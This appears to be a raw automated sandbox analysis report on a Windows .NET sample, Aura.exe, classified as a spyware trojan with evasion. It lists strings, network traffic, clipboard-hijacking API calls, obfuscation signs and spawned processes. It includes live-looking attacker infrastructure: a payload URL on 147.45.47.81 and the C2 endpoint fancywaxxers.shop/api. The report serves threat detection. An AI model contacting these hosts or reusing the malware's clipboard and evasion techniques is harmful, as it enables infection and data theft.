Source: Aura.exe, 00000003.00000002.2898376850.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/1J
Source: Aura.exe, 00000003.00000002.2898376850.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/C
Source: Aura.exe, 00000003.00000002.2898411486.0000000001745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exe
Source: Aura.exe, 00000003.00000002.2898360681.0000000001727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exeD5
Source: Aura.exe, 00000003.00000002.2897986678.00000000012FB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exepleWebKit/537.36
Source: Aura.exe, 00000003.00000002.2898411486.0000000001745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exeso
Source: Aura.exe, 00000003.00000002.2898376850.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/f1
Source: Aura.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Aura.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Aura.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Aura.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Aura.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Aura.exe, 00000003.00000002.2898316095.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.miUQb
Source: Aura.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Aura.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Aura.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Aura.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: Aura.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Aura.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: Aura.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: Aura.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Aura.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: Aura.exe, 00000003.00000002.2898297311.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: Aura.exe, 00000003.00000002.2898411486.0000000001745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/O
Source: Aura.exe, 00000003.00000002.2898411486.0000000001745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/a
Source: Aura.exe, 00000003.00000002.2898360681.0000000001727000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000003.00000002.2898411486.0000000001745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: Aura.exe, 00000003.00000002.2898316095.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api;
Source: Aura.exe, 00000003.00000002.2898428114.000000000174E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/api
Source: Aura.exe	String found in binary or memory: https://www.entrust.net/rpa0

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: C:\Users\user\Desktop\Aura.exe

Code function: 3_2_004387A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_004387A0

Source: C:\Users\user\Desktop\Aura.exe

Code function: 3_2_03981000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

3_2_03981000

Source: C:\Users\user\Desktop\Aura.exe

Code function: 3_2_004387A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_004387A0

Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_01490861	0_2_01490861
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_01490870	0_2_01490870
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00408890	3_2_00408890
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004311FA	3_2_004311FA
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00422190	3_2_00422190
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004269A0	3_2_004269A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00445280	3_2_00445280
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0040CB88	3_2_0040CB88
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004173A6	3_2_004173A6
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00445C10	3_2_00445C10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0043E540	3_2_0043E540
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0040E5BF	3_2_0040E5BF
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00429E40	3_2_00429E40
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00412670	3_2_00412670
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00418849	3_2_00418849
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00406810	3_2_00406810
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00415831	3_2_00415831
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041E0C0	3_2_0041E0C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0043F8D0	3_2_0043F8D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004308AB	3_2_004308AB
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004308BA	3_2_004308BA
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0043F140	3_2_0043F140
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0040E949	3_2_0040E949
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00445950	3_2_00445950
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0043495A	3_2_0043495A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00409970	3_2_00409970
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00444970	3_2_00444970
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00403920	3_2_00403920
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0042B1C9	3_2_0042B1C9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004441B4	3_2_004441B4
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0042B9B0	3_2_0042B9B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004229B0	3_2_004229B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00421272	3_2_00421272
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00444A00	3_2_00444A00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041AA10	3_2_0041AA10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00411A24	3_2_00411A24
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004082D0	3_2_004082D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004042D0	3_2_004042D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00432AD6	3_2_00432AD6
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00402AE0	3_2_00402AE0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004382B0	3_2_004382B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0040D352	3_2_0040D352
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00419B60	3_2_00419B60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041E360	3_2_0041E360
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041836E	3_2_0041836E
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0043130D	3_2_0043130D
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00405B20	3_2_00405B20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00429330	3_2_00429330
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00436330	3_2_00436330
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0043DB30	3_2_0043DB30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0042A33F	3_2_0042A33F
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00406380	3_2_00406380
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041CB80	3_2_0041CB80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0040B38E	3_2_0040B38E
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041DB90	3_2_0041DB90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004253A2	3_2_004253A2
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004193B3	3_2_004193B3
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00433C5A	3_2_00433C5A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00408C30	3_2_00408C30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041D430	3_2_0041D430
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00431430	3_2_00431430
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041BCC6	3_2_0041BCC6
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004094D0	3_2_004094D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00414C80	3_2_00414C80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0040ACB0	3_2_0040ACB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004311FA	3_2_004311FA
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00431D74	3_2_00431D74
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0043CD2B	3_2_0043CD2B
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00415D3C	3_2_00415D3C
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004385C0	3_2_004385C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0043D5D7	3_2_0043D5D7
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041FDE0	3_2_0041FDE0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004075F0	3_2_004075F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004425F0	3_2_004425F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0043DD90	3_2_0043DD90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0042AD9C	3_2_0042AD9C
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00444DA0	3_2_00444DA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0040B38E	3_2_0040B38E
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00416E25	3_2_00416E25
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00404E30	3_2_00404E30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041DE30	3_2_0041DE30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00402ED0	3_2_00402ED0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004176D0	3_2_004176D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00422ED0	3_2_00422ED0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00428ED0	3_2_00428ED0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00441ED0	3_2_00441ED0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0042FEE4	3_2_0042FEE4
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0042469C	3_2_0042469C
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004456A0	3_2_004456A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004446B0	3_2_004446B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00427F4D	3_2_00427F4D
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0042B703	3_2_0042B703
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004447C9	3_2_004447C9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004447CB	3_2_004447CB
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00444FD0	3_2_00444FD0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004357D9	3_2_004357D9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00435FE0	3_2_00435FE0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0041D780	3_2_0041D780
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_004447B0	3_2_004447B0

Source: C:\Users\user\Desktop\Aura.exe	Code function: String function: 00414C70 appears 128 times
Source: C:\Users\user\Desktop\Aura.exe	Code function: String function: 004080D0 appears 39 times

Source: C:\Users\user\Desktop\Aura.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 928

Source: Aura.exe

Static PE information: invalid certificate

Source: Aura.exe, 00000000.00000002.1780477287.000000000124E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs Aura.exe

Source: Aura.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Aura.exe

Static PE information: Section: .bss ZLIB complexity 1.0003340475731894

Source: Aura.exe, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Aura.exe, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Aura.exe.3ef9550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Aura.exe.3ef9550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@1/2

Source: C:\Users\user\Desktop\Aura.exe

Code function: 3_2_0043E540 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_0043E540

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
Source: C:\Users\user\Desktop\Aura.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7256

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\cfd80823-3fe2-4304-b786-c5227ebed35a

Jump to behavior

Source: Aura.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Aura.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Aura.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe

File read: C:\Users\user\Desktop\Aura.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 928
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Aura.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Aura.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Aura.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: Handler.pdb source: Aura.exe, WER4E99.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER4E99.tmp.dmp.6.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Aura.exe, OqnvDGyNnPPvG6T46X.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Aura.exe.3ef9550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: Aura.exe

Static PE information: 0xB22C430A [Sun Sep 21 17:53:14 2064 UTC]

Source: Aura.exe

Static PE information: real checksum: 0x5dea1 should be: 0x68f8d

Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_00425357 push edi; ret	3_2_00425358
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0044A37A push D439B600h; retf	3_2_0044A37F
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0044B3A8 push esp; retf	3_2_0044B3A9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 3_2_0044A430 push ecx; iretd	3_2_0044A431

Source: Aura.exe, OqnvDGyNnPPvG6T46X.cs	High entropy of concatenated method names: 'Qerauq6FF2', 'nW4lBacjpc', 'NBbmObeVEM', 'bqpm7jSIZK', 'sREmHxnXei', 'uu3mAcrNh4', 'n0OmcKY1xJ', 'A1VRDsBnZ', 'oqBlqdN3O', 'pRhoMmNSX'
Source: 0.2.Aura.exe.3ef9550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	High entropy of concatenated method names: 'Qerauq6FF2', 'nW4lBacjpc', 'NBbmObeVEM', 'bqpm7jSIZK', 'sREmHxnXei', 'uu3mAcrNh4', 'n0OmcKY1xJ', 'A1VRDsBnZ', 'oqBlqdN3O', 'pRhoMmNSX'

Source: C:\Users\user\Desktop\Aura.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
